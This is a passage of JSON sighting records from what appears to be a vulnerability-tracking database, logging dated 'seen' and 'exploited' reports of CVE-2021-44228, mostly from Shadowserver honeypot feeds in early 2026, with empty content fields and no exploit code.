"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-02)", "content": "", "creation_timestamp": "2026-01-02T00:00:00.000000Z"}, {"uuid": "316a2c57-a2f6-4bd4-a92d-e425c1bf0747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-04)", "content": "", "creation_timestamp": "2026-01-04T00:00:00.000000Z"}, {"uuid": "2eaa2117-d824-4d1d-8160-02bfeeaf41c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-03)", "content": "", "creation_timestamp": "2026-01-03T00:00:00.000000Z"}, {"uuid": "4c73d38e-9c19-45ee-9788-34d5dc930329", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-05)", "content": "", "creation_timestamp": "2026-03-05T00:00:00.000000Z"}, {"uuid": "d538e288-cc26-4670-af93-c6b024c3277d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-07)", "content": "", "creation_timestamp": "2026-03-07T00:00:00.000000Z"}, {"uuid": "d4d54ed1-83ae-4536-875a-ad9f6eaa7cd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-03)", "content": "", "creation_timestamp": "2026-01-03T00:00:00.000000Z"}, {"uuid": "82d410a8-fbd9-437a-81bb-2e780e5d7784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-20)", "content": "", "creation_timestamp": "2026-02-20T00:00:00.000000Z"}, {"uuid": "3587794f-f285-4bb3-9422-d1fe19949b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfj2pr5fvd27", "content": "", "creation_timestamp": "2026-02-23T06:49:18.666472Z"}, {"uuid": "a2243287-ee84-44b8-ba9c-8492e0c184f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "bfe8378a-c597-45ab-a54e-45a30004b41f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/camen-collab/ca4f10ac09235a034cf434327f6c72ba", "content": "", "creation_timestamp": "2026-03-17T01:00:15.000000Z"}, {"uuid": "552e174c-7d04-4f1e-888d-f82f8f0c0e16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-28)", "content": "", "creation_timestamp": "2026-02-28T00:00:00.000000Z"}, {"uuid": "01b78c6c-2346-43f7-933f-5fcabab97c78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "e195160b-4917-4f21-875b-26728bcd1c05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-19)", "content": "", "creation_timestamp": "2026-02-19T00:00:00.000000Z"}, {"uuid": "2bf9d06a-bdca-4d53-96d8-faf69e3432c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "f1dd1bc8-d894-403f-86f0-edb1b21c97a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "733dd9be-e0c6-41ca-91b3-72d2790de966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-07)", "content": "", "creation_timestamp": "2026-01-07T00:00:00.000000Z"}, {"uuid": "d4f2f1f6-3171-4164-9687-bdc177ae57de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-08)", "content": "", "creation_timestamp": "2026-01-08T00:00:00.000000Z"}, {"uuid": "ed0e2071-e191-4bf7-bd2c-224f49cc84a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-10)", "content": "", "creation_timestamp": "2026-03-10T00:00:00.000000Z"}, {"uuid": "febc79dd-cc0c-4df4-ba50-22872fc440fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-25)", "content": "", "creation_timestamp": "2026-03-25T00:00:00.000000Z"}, {"uuid": "5966705b-7231-4e68-805b-8387ccd98e0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-09)", "content": "", "creation_timestamp": "2026-01-09T00:00:00.000000Z"}, {"uuid": "9f93a137-5f60-4392-b785-f04c90b3b70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "22bbcda8-ef2e-4670-ac77-07d319cadfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-19)", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "e0209431-5ea3-45eb-9e80-994d06f0e29e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-09)", "content": "", "creation_timestamp": "2026-01-09T00:00:00.000000Z"}, {"uuid": "ab8d658f-5687-4026-9976-78abadf22252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-10)", "content": "", "creation_timestamp": "2026-01-10T00:00:00.000000Z"}, {"uuid": "a19667a7-58c7-4362-8a6b-6927571ea1d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-10)", "content": "", "creation_timestamp": "2026-01-10T00:00:00.000000Z"}, {"uuid": "6bad2b81-57ab-48e3-9e52-4fbc3cb082e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-29)", "content": "", "creation_timestamp": "2026-03-29T00:00:00.000000Z"}, {"uuid": "e37bdc50-ef50-4415-8329-329c5aecab59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "e52e7da4-b269-4088-a0d1-9d44fb8e252e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "33028446-b0ce-4e2f-9044-d9dbef4c5b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "2ecf9315-a897-4e18-92bc-5d5c15d43f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-23)", "content": "", "creation_timestamp": "2026-03-23T00:00:00.000000Z"}, {"uuid": "63a6d265-4361-41b4-b2d8-70b6292dee59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-14)", "content": "", "creation_timestamp": "2026-03-14T00:00:00.000000Z"}, {"uuid": "00148b40-4ae5-4f23-baf1-b5f85bccdb6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-12)", "content": "", "creation_timestamp": "2026-03-12T00:00:00.000000Z"}, {"uuid": "579d5f4c-9b4b-4e9e-b88d-beab88e8766e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "d3388882-93de-4a53-8251-56d33e5582ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "e5a03f9a-67c0-4103-8b16-49c4076d466a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-18)", "content": "", "creation_timestamp": "2026-03-18T00:00:00.000000Z"}, {"uuid": "4e73356a-cc30-437e-ba90-72ccc2384756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-13)", "content": "", "creation_timestamp": "2026-01-13T00:00:00.000000Z"}, {"uuid": "8c749a62-9696-482f-ae32-c7e758f5ee7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-26)", "content": "", "creation_timestamp": "2026-03-26T00:00:00.000000Z"}, {"uuid": "cd36e7b7-47f5-4ad2-a57a-93e016bc9d8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-13)", "content": "", "creation_timestamp": "2026-03-13T00:00:00.000000Z"}, {"uuid": "91bfec46-4c4e-4dde-8dc3-e62cd9d46786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-16)", "content": "", "creation_timestamp": "2026-03-16T00:00:00.000000Z"}, {"uuid": "1f277c2d-7ef1-44f7-97ec-04b4672a2919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-24)", "content": "", "creation_timestamp": "2026-03-24T00:00:00.000000Z"}, {"uuid": "c91d3fc8-d756-4251-b3f1-61e4fce6c58a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "0c258532-5c7e-4648-a6cc-aa34271f736b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-11)", "content": "", "creation_timestamp": "2026-03-11T00:00:00.000000Z"}, {"uuid": "2b4276ff-474d-45ce-9aa4-62fee987e899", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-14)", "content": "", "creation_timestamp": "2026-01-14T00:00:00.000000Z"}, {"uuid": "6a1b0bd2-750a-446e-a105-fdda2953d0ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-18)", "content": "", "creation_timestamp": "2026-01-18T00:00:00.000000Z"}, {"uuid": "c2ab5b44-44ca-49de-be0a-1fe2dfa90370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-15)", "content": "", "creation_timestamp": "2026-01-15T00:00:00.000000Z"}, {"uuid": "96ce602f-20e1-4308-8d1d-084617a3d55b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "02785c8f-948f-46c5-b7dd-4b7da1de02cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-16)", "content": "", "creation_timestamp": "2026-01-16T00:00:00.000000Z"}, {"uuid": "af5279ec-39c9-46e8-93c1-e608fd1782a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-17)", "content": "", "creation_timestamp": "2026-01-17T00:00:00.000000Z"}, {"uuid": "19698834-a102-4963-bee9-38c53826e9fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "af40b76a-28e9-4c6f-b3de-28ce685df498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_38/2021", "content": "", "creation_timestamp": "2021-12-10T08:54:02.000000Z"}, {"uuid": "e1bed657-c8da-48fb-b417-c1ca6254acc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=705", "content": "", "creation_timestamp": "2021-12-20T04:00:00.000000Z"}, {"uuid": "ac6804a9-d5b4-47f5-8d66-8b03c6f92366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "329e318c-261d-4938-84bc-30b6d46575b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-19)", "content": "", "creation_timestamp": "2026-01-19T00:00:00.000000Z"}, {"uuid": "34d9fae6-134c-4d85-9a0e-e5232aa18b57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-15)", "content": "", "creation_timestamp": "2026-03-15T00:00:00.000000Z"}, {"uuid": "9f9f3e96-38b7-4aa5-8a84-4f11f3e8e285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "ad022924-2a9b-4ee6-b152-bfc2eead0595", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=700", "content": "", "creation_timestamp": "2021-12-10T04:00:00.000000Z"}, {"uuid": "fdfee9c9-df0c-481c-abcd-5c6dd0230cb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "a57ca3e0-b5e2-4d42-b8dd-9acdd30bcc1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-20)", "content": "", "creation_timestamp": "2026-01-20T00:00:00.000000Z"}, {"uuid": "7788181c-dbee-4d8f-8e1e-f37cb2d8d5cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-21)", "content": "", "creation_timestamp": "2026-01-21T00:00:00.000000Z"}, {"uuid": "ed90fe95-3f13-4996-8adf-badefca402eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "56415726-0ab2-45ae-ae2f-32c6d47ca768", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-22)", "content": "", "creation_timestamp": "2026-01-22T00:00:00.000000Z"}, {"uuid": "a40f3812-16e0-46e0-9779-13fb2ccad2be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "6bf74ccf-ae76-4167-a853-20fca0b75b6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/alon710/55414f10a9656d4d61dfbf21c7674f36", "content": "", "creation_timestamp": "2026-01-24T22:43:14.000000Z"}, {"uuid": "bff30ec3-ba32-4ac0-bc33-cb25b1048ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-23)", "content": "", "creation_timestamp": "2026-01-23T00:00:00.000000Z"}, {"uuid": "ad19454d-37d3-4d82-b9a5-a537681c544d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-24)", "content": "", "creation_timestamp": "2026-01-24T00:00:00.000000Z"}, {"uuid": "c5185882-85d1-49cc-84b8-a498525c1ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-25)", "content": "", "creation_timestamp": "2026-01-25T00:00:00.000000Z"}, {"uuid": "cd276e5c-e53b-4cb0-beca-bb3734b1093c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-27)", "content": "", "creation_timestamp": "2026-01-27T00:00:00.000000Z"}, {"uuid": "481a6498-5475-4864-b4e6-10518805b383", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-26)", "content": "", "creation_timestamp": "2026-01-26T00:00:00.000000Z"}, {"uuid": "7ab75d56-a157-4b9c-8544-d2a63d2baf0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-30)", "content": "", "creation_timestamp": "2026-03-30T00:00:00.000000Z"}, {"uuid": "7f3961dc-f749-42cd-8d43-79b088776276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/1a45906b-8393-4ad9-ae60-01e390610497", "content": "", "creation_timestamp": "2026-02-02T12:28:32.056840Z"}, {"uuid": "18886bf0-8e02-45da-80af-3e7737893272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "13634cc1-9d67-4b9d-b920-42d05dee66ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-31)", "content": "", "creation_timestamp": "2026-03-31T00:00:00.000000Z"}, {"uuid": "2da25c94-d90d-48e9-9ce6-6248093934ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-01)", "content": "", "creation_timestamp": "2026-04-01T00:00:00.000000Z"}, {"uuid": "9cb7fc0b-f5f0-4aef-a279-7392ef1967e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": 